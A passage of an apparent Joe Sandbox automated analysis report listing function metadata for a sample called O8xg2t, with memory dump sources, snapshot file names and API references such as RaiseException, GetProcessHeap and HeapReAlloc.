                                    • Part of subcall function 00007FFBC1BA3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBC1BA3A63
                                  • __GSHandlerCheckCommon.LIBCMT ref: 00007FFBC1BB0993
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CheckCommonHandler__except_validate_context_record
                                  • String ID: csm$f
                                  • API String ID: 1543384424-629598281
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: TimerWaitable
                                  • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                  • API String ID: 1823812067-484248852
                                  APIs
                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC1BA112F), ref: 00007FFBC1BA39E0
                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC1BA112F), ref: 00007FFBC1BA3A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFileHeaderRaise
                                  • String ID: csm
                                  • API String ID: 2573137834-1018135373
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: TimerWaitable
                                  • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                  • API String ID: 1823812067-3336177065
                                  APIs
                                  • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                  • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0